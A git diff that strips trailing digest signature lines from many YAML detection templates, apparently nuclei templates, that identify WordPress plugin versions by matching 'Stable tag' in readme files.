@@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008af1cea4f7f716f33a7f99c3442ad65eeab25946e2b9e66638f2faab1ba427cc0221008d9efec8129e7471a282b135f7d8c32efcc80690fdb7787849398e2fdd563e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 987178ebe9d..b509d8cc670 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009aed91a1a7bafe89496aec46a0b0b0a3c74e84d6326ed00a2182594ce806750302204f2c720a0d5871a182d28de866fd549cfdd253574fe4e87045e52778bc704156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 0869974979a..c984479bde5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220323af72842f53b591b5fe909644d6033bf57cb6568276252a3ac4392c04910270220534a33ea4b8b579862cc0025c31a511d6536c9f4006404336041b07510c3ab0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index db51d90833b..a3870175c7d 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fb657a278f5cec6f184504864956629dbb95315c3d408a6e7a930d129debeaa022100b942da3e0147f8ac616b58ed0cb024e411b0f4c688f64074711e2242bbfb1f2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 45494721f76..f5f3818ea24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb9570b0c0fcf1cdc9d2df8d18704006f8236f05f4eb1fc6caa30208c225070902201514380ca01da0dd074678dddf841f2eeedd8c381736f378bc9deae7238ccc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 79a5a833933..7e5b54c12c7 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072f8673849fce41dc24e7b779a09b59f033eb8354eb4040750ff7e1039378be3022100e663678da320fefdf903317aabcb9f00fd4bd33e2f655a43f72dde521c3efdc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index bad78e7a0c8..59effd09f64 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053e2cad3a17e0cd229aee0ffb49283ad7fba15510651fc1f74377e2f0ee3e9dd022100b98644ebe15097d12c123fbc9092911427efaba878f38b771b80ee5d6576e522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 1cbc9102758..833207dcff4 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef747795c419b4dc2eab45ad22ff8afd8c00f8961ada087559704b443f0f40320221008f51d6d8d888e76dd0d01ac826f4147eed532615f1a2ecbecca9cebcf306a801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index a0060733544..b7ea2d38d1c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220575f3da25e08e7359033e37696568d5ae5cfeb53e048890f16ac9b551ea964d5022100f021c44001b9c753bd6bc5c615fd951c4be9bae4ba8626303203f5610cb0547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index a8fcb984f7a..2131dbe751b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d097ed0d67e34d98eb0d9d5ae81c31ffa709551834e3d09ddd48fbdee61a2bd0220128bd91e2c0ecce4cc5204cf433fb1ee5f1643fb4bbf07ef62566201fdb8a8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 0bcc326e252..73d644c5e47 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d71ae447da0acaa3d47d9c793f110de18ddfd78d0beca6e6dd9256cec60c2cab022100adc8f618cb95625032f34b257bc96546d16e2474fa277ec1fa625c0332f8bba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index f789f0c67b9..7b0593dcb76 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb8c4a3528ca69521db99f4482068d769fa7460f2a665311a238ff64057a70410221008ec0bcf392cc11b84ead7863869594d57531903d7ea133b5d83bf4400a3d68c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index bc4a3007563..6f65d087e49 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089c8db51a0d64802c7cd64668c4a63a6b077d1f0e3b01a15b6cd914477c8c1e3022100d5e76ba20bcda6ec5181ee77d484e7419728d9c7d722fc7f18515cf89b804fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 57e70807206..783cdd283de 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200412383001a535dbe1db8b9a2e1a4f8ffdc4be55bc3aa2f6f17411cf69b847c6022100f9c2df846212fa96c3327eec234c6c758c105af874cd3f183b400e980784b6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 8e5c4fd9c7c..05121854b3e 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012846a7ac2c5b55c33327a4a6a175615ef328cbd575c5211c0721755ff4fee31022067bf4e3c926c63b5a33a395f78eebc7606310993ff724ba0e29e67b4abca238b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 4fb6384545f..72f52edcd44 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b410f16998b2183ce860ee15dae98f833d09d3d830cec1ecee54c715eef69e64022067dad85683cac910313432e5803df84e6fed7735c5fa3c5d26533b29bbd0cd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 630adc7262e..4cf45ebd74c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202931e718a7ed1fe5ce3127eaa63b2bce379ed425f69a8f25004c446fd92144910221009b3a76b580bd9a9667c12e67bfba85aac2ed5e0bff2b5f21a5185e7139bf6cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 62702f0e634..3d6863e074c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e7b117dd8793a3472b6327f913102a0275e3ec3fe1befe86dcc68acf9d285d802204a0e0769802354ef4a70e8a6d58c928d30655d5cce222c6fc79d13cfe1293ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 816209079d2..79e2813c5eb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205245649163a47e5a199084ff73150f3a6ff4617dc8b4d4925134e53494e707a3022100f47c84764cf087468ac853a85eb51b280fd89313776e18e3708caef85a8b7fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index d41e2129553..ab9a0f1ae30 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8d7c906c2e9cca88af3c58c7d8ecabb94153310039d17dde1bfdc3375d682c2022055a100dcfbcb33ef8d108bf902110fcf9fa9c02dd0d4150bea7bd0558a1e1465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index dfbe49cb14d..5d3adf7c27a 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200690eb466dedf9e3c3cdf3e9b886ae03f0312b33b0a0479b3c99caa36929b32d0221009880f3409e877cb8c41b7b6506d765b0391323f4d0dc99e05debe8b0f258bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index ebb53c85984..eda1d27f047 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1b4a6250a03bcb918a374d7eae1b6764426c43e5cc0fb0dc8b409cc1f8b7097022036d7dc1e5a181cff7497c008ded97216ffb345e0d5bd6de0bf136bb689ebdc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 74c5894bab2..16dfc8df5f5 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d10292f8ed8a9f3b5a08005b72d2bf763cf3e4b606b0f420c2a0fccbae89810e02201dcb72810467d70c4b3c4721475cfe5afef575faeb4e5044da542ec15abfc509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index f2d56b72baf..4b7600ea697 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056b77d4e5b296d848bdc3b402a9f8c2bd5b52d39cb9b3016908bf2ea6149a06d0220557817d9290e2c8beb217389166eb727a6aaf76443ef6e8c1ba3c2e816cc5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index bfa693f52e6..2ccd4dbce85 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2296541e1d47a5b6aa5966e6559ae60f0f540ad3d2a3ac01a4d626c2ff06e540221008261a1cfce7492c3948b74620bb3bf6ec655f064f58764ef8407c81b64deab71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 7bfcca0ee0b..02ceb224d1c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206753cf1d015adc4ac187628342db1dfe7b4daa2c40a6307fbc7949d2783c364002200660cc2a63c5ad8928f4dcf656e38839407afe3fc68458a595f94aaa50f5ead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 490a1fbbdae..367d587ce2b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059bd3e8555ffe86954cf660bff282cde3d54e935322b7baa22236e03ea1efff0022100a55d5775a9b5195757a552bdf8bc4c640413ee8a9cfa838cc859f8d0ae5d7cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 99c5cdc49a3..feed730ee0c 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017136fc7f06b1163c68c792dbaab177f2806203b358126f763ef646cf890d543022100f7c1bf824da9d96a796197ef0da650f0cff03dc557da33de00ca9e0ed4a115f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index fbe764126e8..9b2841e7ca7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6b837ca9a54dce77a5e4f470b4fc01e71b2d3e6f3f97a03fecfadef6b856f03022075c67fc42cd86216ecb04d1a628f568df7583e18894d9954a04e64d2491a57db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6e12cc5f562..42be14c5dfe 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1301a67a640666dda200e8c6d1c331e055438476109a6549c4f6c975523f0b8022100c3896e87d77708d12db896f1e77eefda1852f915064152163672429bbc11d677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 7dee749ead4..4e0cd86c3f7 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203246d920e5683a41278f0b83b00471aaac66fd7746a75c4b00e7ca112704e8d00221009b77c445c843f7ea219d05643aaacd80971841fbbab5c16e6ea2a30e8bd1d25a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 5315ffae17b..59eadc5e6e7 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e162dfb9aa028f8793e4a28bfd7f2ae51f1dbaafef21b2adb5b54e765209116022027aa6376a2e815336a21cc6d0e3b86013933fb68297fddad67c91aea5e2fa9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index aba93bde64f..41f7a0075e3 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003c99003c78431ad6fdc1d3da3e8da386d99abbbf008bf60e5331f89ef7289ed022100d7d34e2f7a529718cb345108636db17fef60b06d865d165ee62b00c1071bd6d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 35c6aca7378..7e35a3fb4fa 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b417f3148399a19a5b02d0cd525176cae74be6ef464abd6593b08730a34801f602203c7819f302c992909681d2306edca21ef6c8d0e1fbab63d928e99eb4eac9add1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a714a83cf58..18c2a7586e9 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f0db8c3d5b0bfef644d7c6bed9eb618a8fd0ef5f3ede6c2a154a124175820ef02207bc66d945596af83b8d84732059eb63eb00d29b0506d99a7247ce16c5fa74452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 0f8e65d595b..6bc2aa78f96 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024ceef3a175174bb5a046ac70f5a3d026f751081ba6252a437b65bfc393ada7b02201ee73ce20782da5763f0e702b2901a9b42c583405a0683cc0f22f8bd694e53a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index e606da27df2..a43d3352a27 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3df6f8875b86d322fde441d9e9bf1ac8147d3fc2e16dd7d6ba5d7bc5b01e4f302203c2b0f34cd288a039a7876fcfde43c707f95cdd262035bad18765171ddcefc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 3c4b8d7233b..e7db9944e45 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b5e286a6e38b888585cd6e81e7fed586e49920e29669426b6ab0ce03212833402210088b403215160884227ba3b44ba0fbf5a6f6f901676b8dd04c51efe658786b234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 59f3a576a3b..268bd7b9dfa 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d47172b8cc4d387ab1a4a1a099de6c0ba752c3ebd6c13e69c93642709e3e007022100fc1cd748a79f444eb9b95bcd3209924054ae9ce29362403eb01b7ab02690f6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 100c1f3247a..d7fb2209d19 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c703c344c2d3eda76ccb6505429cc22f40449a02ff425d27811c5fe2a885881402207242b463fed517b029d5d236afb5fc17fa76203ac72bcd9bd5c7cda32fd97e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 30075abc53d..a1641d46328 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100979e636eee391f656123f25e53fa9bc5578e0a5eb55c4cfe8a6beff3b0e01606022100835348fe40515702ae039687e9a0ea9b2c5eaf1abe9241e577da6dd7b20e3db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 7fe3621ed50..3b6542683c7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e0dc16d09c9bdf86b2435bfb1c3b8f5728519c34160581918a4ee2c14c9c2230220087428f3d23dfd66485a97e007bae4974ec0363d4f7607c8cf92d440e3564a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index df1865d4317..969c280ee17 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220060e1e206ac695b643fc3a00062d0c0a4a4effdffd394ccd9287bf3b7ace3a8802206f790eba87577ec056b20150e69b719d5ecb242ede2a6e45bd46960c4e71ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 6f25144d7ac..1c97c422e41 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff8bc475cb96360cd88159552d1a16d5834c478313ea7e4751ba7f716be43044022063c59a58b57746120f1d187b0b0aeb42190b9f19e0132dc2af7fcdd0de3d04f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8bdd9ff5fde..7d861cf06a1 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220548f429aff480125ad59eb4f3a55abd9004e341c4de73610f01610509b54563e0221009abc41400ed025df88753453ef390dbef34ad7661600d1fa2cb99efeb539393b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 653995dd461..00eb1e2dfcf 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046ff97a6aea566a22d41fc274c2d6d3b2c1d6eb7d9a8151dd8cc51756a5b100602203e329b1f25a08da5569308e2b3a2437a55058b8c25c31d2081eb0824f7881895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 9b1b531c2ac..f089ee37d31 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a67999a8f34b89f78dafdea3fd03ee34f112e9d612bab3b65a9c5a7e7a567f060221008da785a09b681da86adc90dc671084fc0f385d7fe7162890ff1f8f11f0ca7285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 23568d16ad8..492d66db688 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 